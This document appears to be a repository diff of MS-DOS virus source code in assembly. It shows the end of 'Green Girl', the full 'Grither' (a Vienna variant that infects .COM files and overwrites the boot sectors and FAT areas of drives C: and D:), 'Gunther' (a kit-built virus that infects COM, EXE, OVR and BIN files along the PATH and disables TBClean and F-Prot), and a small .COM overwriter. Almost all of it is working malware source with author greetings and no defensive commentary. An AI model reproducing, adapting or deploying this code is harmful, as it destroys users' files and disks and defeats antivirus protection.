NEW_DTA_AREA DB 128 DUP (?) ; New DTA place
ATTRIBS DW 0 ; Buffer for file attributes
TIME DW 0 ; " " " time
DATE DW 0 ; " " " date
FILE_HEADER DB 01AH DUP (?) ; File Header Read/Write Buffer
OLD_ERROR DW 0,0 ; Hold old error handler address
OLD_DATA DB 512 DUP (?) ; Holds old boot block
;
END_FILE: ;
GREEN_GIRL ENDS ;
END BEGIN ;
MSDOS/G-Index/Virus.MSDOS.Unknown.greeting.asm
+2615
View File
File diff suppressed because it is too large Load Diff
MSDOS/G-Index/Virus.MSDOS.Unknown.grither.asm
+330
View File
@@ -0,0 +1,330 @@
;**************************************************************************
;** GRITHER VIRUS **
;** Created: 27 Oct 1990 **
;** [NukE] Notes: Does come from the Vienna Virus! And copies itself on **
;** *.COMs and will re-write the begining sectors of drive **
;** C: & D:! Erasing the FATs area... **
;** **
;** Sources Brought to you by -> Rock Steady [NukE]s Head Programmer! **
;** **
;**************************************************************************
data_1e equ 2Ch ; (65AC:002C=0)
data_2e equ 75h ; (65AC:0075=0)
data_3e equ 79h ; (65AC:0079=0)
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
grither proc far
start:
;* jmp short loc_1 ;*(0112)
db 0EBh, 10h
db 90h
data_5 db 'Qº', 9, 3, 'ü‹òÆ' ; Data table (indexed access)
db 0Ah, 0
db 0BFh, 0, 1, 0B9h, 3, 0
db 0F3h, 0A4h, 8Bh, 0F2h, 0B4h, 30h
db 0CDh, 21h, 3Ch, 0, 75h, 3
db 0E9h, 0C5h, 1
loc_2:
push es
mov ah,2Fh ; '/'
int 21h ; DOS Services ah=function 2Fh
; get DTA ptr into es:bx
mov [si+0],bx
nop ;*Fixup for MASM (M)
mov [si+2],es
nop ;*Fixup for MASM (M)
pop es
mov dx,5Fh
nop
add dx,si
mov ah,1Ah
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
push es
push si
mov es,ds:data_1e ; (65AC:002C=0)
mov di,0
loc_3:
pop si
push si
add si,1Ah
nop ;*Fixup for MASM (M)
lodsb ; String [si] to al
mov cx,8000h
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
mov cx,4
locloop_4:
lodsb ; String [si] to al
scasb ; Scan es:[di] for al
jnz loc_3 ; Jump if not zero
loop locloop_4 ; Loop if cx > 0
pop si
pop es
mov [si+16h],di
nop ;*Fixup for MASM (M)
mov di,si
nop
add di,1Fh
nop ;*Fixup for MASM (M)
mov bx,si
add si,1Fh
nop ;*Fixup for MASM (M)
mov di,si
jmp short loc_10 ; (01B9)
loc_5:
cmp word ptr [si+16h],0
nop ;*Fixup for MASM (M)
jne loc_6 ; Jump if not equal
jmp loc_19 ; (02E9)
loc_6:
push ds
push si
mov ds,es:data_1e ; (65AC:002C=0)
mov di,si
mov si,es:[di+16h]
nop ;*Fixup for MASM (M)
add di,1Fh
nop ;*Fixup for MASM (M)
loc_7:
lodsb ; String [si] to al
cmp al,3Bh ; ';'
je loc_9 ; Jump if equal
cmp al,0
je loc_8 ; Jump if equal
stosb ; Store al to es:[di]
jmp short loc_7 ; (019B)
loc_8:
mov si,0
loc_9:
pop bx
pop ds
mov [bx+16h],si
nop ;*Fixup for MASM (M)
nop
cmp ch,5Ch ; '\'
je loc_10 ; Jump if equal
mov al,5Ch ; '\'
stosb ; Store al to es:[di]
loc_10:
mov [bx+18h],di
nop ;*Fixup for MASM (M)
mov si,bx
add si,10h
nop ;*Fixup for MASM (M)
mov cx,6
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov si,bx
mov ah,4Eh ; 'N'
mov dx,1Fh
nop
add dx,si
mov cx,3
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jmp short loc_12 ; (01DD)
loc_11:
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
loc_12:
jnc loc_13 ; Jump if carry=0
jmp short loc_5 ; (017F)
loc_13:
mov ax,ds:data_2e[si] ; (65AC:0075=0)
and al,1Fh
cmp al,1Fh
je loc_11 ; Jump if equal
cmp word ptr ds:data_3e[si],0FA00h ; (65AC:0079=0)
ja loc_11 ; Jump if above
cmp word ptr ds:data_3e[si],0Ah ; (65AC:0079=0)
jb loc_11 ; Jump if below
mov di,[si+18h]
nop ;*Fixup for MASM (M)
push si
add si,7Dh
nop ;*Fixup for MASM (M)
loc_14:
lodsb ; String [si] to al
stosb ; Store al to es:[di]
cmp al,0
jne loc_14 ; Jump if not equal
pop si
mov ax,4300h
mov dx,1Fh
nop
add dx,si
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
mov [si+8],cx
nop ;*Fixup for MASM (M)
mov ax,4301h
and cx,0FFFEh
mov dx,1Fh
nop
add dx,si
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
mov ax,3D02h
mov dx,1Fh
nop
add dx,si
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
jnc loc_15 ; Jump if carry=0
jmp loc_18 ; (02DA)
loc_15:
mov bx,ax
mov ax,5700h
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov [si+4],cx
nop ;*Fixup for MASM (M)
mov [si+6],dx
nop ;*Fixup for MASM (M)
mov ah,2Ch ; ','
int 21h ; DOS Services ah=function 2Ch
; get time, cx=hrs/min, dh=sec
and dh,7
jnz loc_16 ; Jump if not zero
mov ah,40h ; '@'
mov cx,85h
mov dx,si
add dx,8Ah
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
jmp short loc_17 ; (02C3)
db 90h
loc_16:
mov ah,3Fh ; '?'
mov cx,3
mov dx,0Ah
nop
add dx,si
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
jc loc_17 ; Jump if carry Set
cmp ax,3
jne loc_17 ; Jump if not equal
mov ax,4202h
mov cx,0
mov dx,0
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
jc loc_17 ; Jump if carry Set
mov cx,ax
sub ax,3
mov [si+0Eh],ax
nop ;*Fixup for MASM (M)
add cx,2F7h
mov di,si
sub di,1F5h
mov [di],cx
mov ah,40h ; '@'
mov cx,306h
mov dx,si
sub dx,1F7h
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
jc loc_17 ; Jump if carry Set
cmp ax,306h
jne loc_17 ; Jump if not equal
mov ax,4200h
mov cx,0
mov dx,0
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
jc loc_17 ; Jump if carry Set
mov ah,40h ; '@'
mov cx,3
mov dx,si
add dx,0Dh
nop ;*Fixup for MASM (M)
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
loc_17:
mov dx,[si+6]
nop ;*Fixup for MASM (M)
mov cx,[si+4]
nop ;*Fixup for MASM (M)
and cx,0FFE0h
or cx,1Fh
mov ax,5701h
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
loc_18:
mov ax,4301h
mov cx,[si+8]
nop ;*Fixup for MASM (M)
mov dx,1Fh
nop
add dx,si
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
loc_19:
push ds
mov ah,1Ah
mov dx,[si+0]
nop ;*Fixup for MASM (M)
mov ds,[si+2]
nop ;*Fixup for MASM (M)
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
pop ds
loc_20:
pop cx
xor ax,ax ; Zero register
xor bx,bx ; Zero register
xor dx,dx ; Zero register
xor si,si ; Zero register
mov di,100h
push di
xor di,di ; Zero register
retn 0FFFFh
db 10 dup (0)
db 0CDh, 20h, 90h, 0E9h, 0, 0
db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0
db 0, 0, 0, 0, 50h, 41h
db 54h, 48h, 3Dh, 0, 0
db 105 dup (0)
db 0EBh, 58h, 90h
db ' `7O `88@99@6r `65@85M%AACC%YMJ%'
db 'LWNYMJW%AACC% `:@86@95r `68@87MH'
db 'tzwyjx~%tk%Jqj}nts `5r$'
db '3'
db 0C0h, 8Eh, 0D8h, 0B0h, 2, 0B9h
db 0A0h, 0, 33h, 0D2h, 0BBh, 0
db 0, 0CDh, 26h, 0BBh, 0, 0
loc_21:
cmp byte ptr data_5[bx],24h ; (65AC:0103=90h) '$'
je loc_22 ; Jump if equal
sub byte ptr data_5[bx],5 ; (65AC:0103=90h)
inc bx
jmp short loc_21 ; (0400)
loc_22:
mov dx,offset data_5 ; (65AC:0103=90h)
mov ah,9
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
int 20h ; Program Terminate
grither endp
seg_a ends
end start

MSDOS/G-Index/Virus.MSDOS.Unknown.guerilla.asm
+1207
View File
File diff suppressed because it is too large Load Diff
MSDOS/G-Index/Virus.MSDOS.Unknown.gunther.asm
+422
View File
@@ -0,0 +1,422 @@
; 'Gunther': A Virus From the Virus Creation 2000 System
; The Virus Creation 2000 System is Copywrited by John Burnette
; All Rights Reserved.
; Author: Havoc The Chaos
; Notes: Fr my lurv, Kiersten B.
; Greetings: Dark Angel, DecimatoR, Dark Avenger (You still out there?)
; The Additude Adjuster, Mucho Mass, The Old Bit Truth Crew,
; and virus writters (Except those who rely on kits and call
; them original code) everywhere!
code segment byte public
assume cs: code
org 100h
id = '=-'
begin:
call next ; Get Delta Offset
next: pop bp
sub bp, offset next
push cs
push cs
pop ds
pop es
mov byte ptr [bp + lock_keys + 3], 244
; Prefetch Cue Unchanged
lock_keys:
mov al, 128 ; Screws DEBUG
out 21h, al ; If Tracing, Lock Keyboard
mov ax, 4653h ; Remove F-Prot Utils
mov bx, 1
mov cx, 2
rep int 2Fh
mov byte ptr cs:[tb_here][bp], 0 ; Reset TB Flag
xor dx, dx
mov ds, dx
mov ax, word ptr ds:[6]
dec ax
mov ds, ax
mov cx, 0FFFFh ; CX = 64k
mov si, dx ; SI = 0
look_4_tbclean:
mov ax, word ptr ds:[si]
xor ax, 0A5F3h
je check_it ; Jump If It's TBClean
look_again:
inc si ; Continue Search
loop look_4_tbclean
jmp not_found ; TBClean Not Found
check_it:
mov ax, word ptr ds:[si+4]
xor ax, 0006h
jne look_again
mov ax, word ptr ds:[si+10]
xor ax, 020Eh
jne look_again
mov ax, word ptr ds:[si+12]
xor ax, 0C700h
jne look_again
mov ax, word ptr ds:[si+14]
xor ax, 406h
jne look_again
mov bx, word ptr ds:[si+17] ; Steal REAL Int 1 Offset
mov byte ptr ds:[bx+16], 0CFh ; Replace With IRET
mov bx, word ptr ds:[si+27] ; Steal REAL Int 3 Offset
mov byte ptr ds:[bx+16], 0CFh ; Replece With IRET
mov byte ptr cs:[tb_here][bp], 1 ; Set The TB Flag On
mov bx, word ptr ds:[si+51h] ; Get 2nd Segment of
mov word ptr cs:[tb_int2][bp], bx ; Vector Table
mov bx, word ptr ds:[si-5] ; Get Offset of 1st Copy
mov word ptr cs:[tb_ints][bp], bx ; of Vector Table
not_found:
mov cx, 9EBh
mov ax, 0FE05h
jmp $-2
add ah, 3Bh ; Hlt Instruction (Kills TD)
jmp $-10
mov ax, 0CA00h ; Exit It TBSCANX In Mem
mov bx, 'TB'
int 2Fh
cmp al, 0
je okay
ret
okay:
mov ah, 47h
xor dl, dl
lea si, [bp+offset dir_buff+1] ; Save Original Directory
int 21h
push es ; New DTA
push ds
mov ah, 1Ah
lea dx, [bp+offset newDTA]
int 21h
lea di, [bp+offset origCSIP2] ; Save For EXE
lea si, [bp+offset origCSIP]
mov cx, 4
rep movsw
mov byte ptr [bp+numinfected], 0
mov ax, 3524h ; New INT 24h Handler
int 21h
mov ax, 2524h
mov dx, offset Int24
int 21h
traverse_path proc near
push bp
pop bx
mov es, word ptr cs:[2Ch] ; ES = Environment Segment
xor di, di ; DI = Starting Offset
find_path:
mov dx,'As'
int 0F2h
lea si,[bx + path_string] ; SI points to "PATH="
lodsb ; Load First Byte in AL
mov cx,08000h ; Check 32767 Bytes
repne scasb ; Search Until The Byte Is Found
mov cx,4 ; Check The Next Four Bytes
check_next_4:
lodsb ; Load The Next Letter of "PATH="
scasb ; Compare It To Environment
jne find_path ; Get Another
loop check_next_4 ; Keep Checking
mov word ptr [bx + path_ad], di ; Save The PATH Address
mov word ptr [bx + path_ad + 2], es ; Save The PATH's Segment
lds si,dword ptr [bx + path_ad] ; DS:SI Points to PATH
lea di,[bp - 70] ; DI = Work Buffer
push cs
pop es
move_subdir:
lodsb ; Load Next Byte
cmp al,';' ; Separator?
je moved_one ; Yes, We're Done
or al,al ; End of Path?
je moved_last_one ; Yes, Quit Our Loop
stosb ; Store Byte at ES:DI
jmp short move_subdir ; Keep Transfering Characters
moved_last_one:
xor si, si ; Clear Buffer
moved_one:
mov word ptr es:[bx + path_ad],si ; Store SI in the path address
cmp si, 0 ; Done?
je done ; Done.
mov ah, 3Bh ; Change Directory
lea dx, [bx + path_ad]
int 21h
lea dx, [di + com_spec] ; Find COM Files
call infect
lea dx, [di + exe_spec] ; Find EXE Files
call infect
lea dx, [di + ovr_spec] ; Find OV? Files
call infect
lea dx, [di + bin_spec] ; Find Binary Files
call infect
jmp move_subdir ; Get Another Sub-Directory
done: ret
traverse_path endp
pop ds ; Restore DTA
pop es
mov ah, 1Ah
mov dx, 80h
int 21h
cmp sp, id ; EXE?
jne infect
restore_exe: ; Restore EXE
mov ax, ds
add ax, 10h
add cs:[bp+word ptr origCSIP2+2], ax
add ax, cs:[bp+word ptr origSPSS2]
cli
mov ss, ax
mov sp, cs:[bp+word ptr origSPSS2+2]
sti
db 00EAh ; Jump To The Original Code
origCSIP2 db ?
old3_2 db ?,?,?
origSPSS2 dd ?
origCSIP db ?
old3 db 0cdh,20h,0
origSPSS dd ?
restore_com: ; Restore COM
mov di, 100h
push di
lea si, [bp+offset old3_2]
movsw
movsb
return: ret ; Jump To Original Code
infect:
mov cx, 7
mov ah, 4Eh ; Find First File
findfirstnext:
int 21h
jc return
cmp word ptr [bp+newDTA+33], 'AM' ; COMMAND.COM?
mov ah, 4Fh
jz findfirstnext ; Yes, So Get Another File
lea dx, [bp+newDTA+30] ; Get Attributes
mov ax, 4300h
int 21h
jc return
push cx ; Save Them
push dx
mov ax, 4301h ; Clear Attributes
push ax
xor cx, cx
int 21h
mov ax, 3D02h ; Open File, Read/Write
lea dx, [bp+newDTA+30]
int 21h
xchg ax, bx
mov ax, 5700h ; Get File Time/Date
int 21h
push cx ; Save Time/Date
push dx
mov ah, 3Fh
mov cx, 1Ah ; Read Into File
lea dx, [bp+offset readbuffer]
int 21h
mov ax, 4202h ; Move Pointer To End Of File
xor cx, cx
cwd
int 21h
cmp word ptr [bp+offset readbuffer], 'ZM' ; EXE?
jz checkexe
mov cx, word ptr [bp+offset readbuffer+1]
add cx, heap-begin+3 ; CX = Filesize
cmp ax, cx
jz jmp_close ; Already Infected
cmp ax, 65535-(endheap-begin) ; Too Large To Infect?
ja jmp_close
lea di, [bp+offset old3] ; Save First Three Bytes
lea si, [bp+offset readbuffer]
movsb
movsw
mov cx, 3 ; Encoded Jump To Virus
sub ax, cx
mov word ptr [bp+offset readbuffer+1], ax
mov dl, 0E9h
mov byte ptr [bp+offset readbuffer], dl
jmp short continue_infect
checkexe:
cmp word ptr [bp+offset readbuffer+10h], id
jnz skipp ; Not Infected, So Infect It
jmp_close:
jmp close ; Infected, So Quit
skipp: lea di, [bp+origCSIP]
lea si, [bp+readbuffer+14h]
movsw ; Save CS and IP
movsw
sub si, 0Ah ; Save SS and SP
movsw
movsw
push bx ; Filename
mov bx, word ptr [bp+readbuffer+8] ; Header Size
mov cl, 4
shl bx, cl
push dx
push ax
sub ax, bx ; File Size - Header Size
sbb dx, 0
mov cx, 10h
div cx
mov word ptr [bp+readbuffer+0Eh], ax ; SS
mov word ptr [bp+readbuffer+10h], id ; SP
mov word ptr [bp+readbuffer+14h], dx ; IP
mov word ptr [bp+readbuffer+16h], ax ; CS
pop ax
pop dx
add ax, heap-begin
adc dx, 0
mov cl, 9
push ax
shr ax, cl
ror dx, cl
stc
adc dx, ax
pop ax
and ah, 1
mov word ptr [bp+readbuffer+2], ax
mov word ptr [bp+readbuffer+4], dx ; Fix Header
pop bx
mov cx, 1Ah
continue_infect:
mov ah, 40h
mov cx, heap-begin ; Add Virus To The End
lea dx, [bp+offset begin]
int 21h
mov ax, 4200h
xor cx, cx ; Move Pointer To Beginning
cwd
int 21h
mov ah, 40h
mov cx, 1Ah ; Write Encoded Jump To Virus
lea dx, [bp+offset readbuffer]
int 21h
inc [bp+numinfected] ; Infection Good
close:
mov ax, 5701h ; Set Orig Date and Time
pop dx
pop cx
int 21h
mov ah, 3Eh ; Close File
int 21h
pop ax ; Restore Attributes
pop dx
pop cx
int 21h
cmp [bp+numinfected], 5
jae bye
mov ah, 4Fh ; No, So Find Another File
jmp findfirstnext
mov ax, 2524h ; New INT 24h Handler
pop dx
pop ds
int 21h
mov ah, 3Bh ; Function: Change Directory
lea dx, [bp+dir_buff] ; Restore Current Directory
int 21h ; Execute Function
bye: ret
Int24: mov ax, 3 ; Error Handling
iret
exe_spec db '*.EXE',0 ; EXE Filespec
ovr_spec db '*.OV?',0 ; OV? Filespec
bin_spec db '*.BIN',0 ; BIN Filespec
com_spec db '*.COM',0 ; COM Filespec
path_string db "PATH=" ; The PATH String To Search For
heap:
donebin db 0
dir_buff db 64 dup (0) ; Current Dir Buffer
newdta db 43 dup (?) ; New Disk Transfer Access
numinfected db ? ; Number Of Files Infected
path_ad dd ? ; Holds The PATH's Address
tb_ints dd 0
tb_int2 dd 0
tb_here db 0
readbuffer db 1ah dup (?)
endheap:
code ends
end begin
MSDOS/G-Index/Virus.MSDOS.Unknown.gv.asm
+21
View File
@@ -0,0 +1,21 @@
xor cx,cx
mov dx,offset File
mov ah,4eh
int 21h
z:
mov dx,9eh
mov ax,3d02h
int 21h
mov bx,ax
mov dx,100h
mov cl,27h
mov ah,40h
int 21h
mov ah,3eh
int 21h
mov ah,4fh
int 21h
jnc z
ret
file db '*.com',0
e: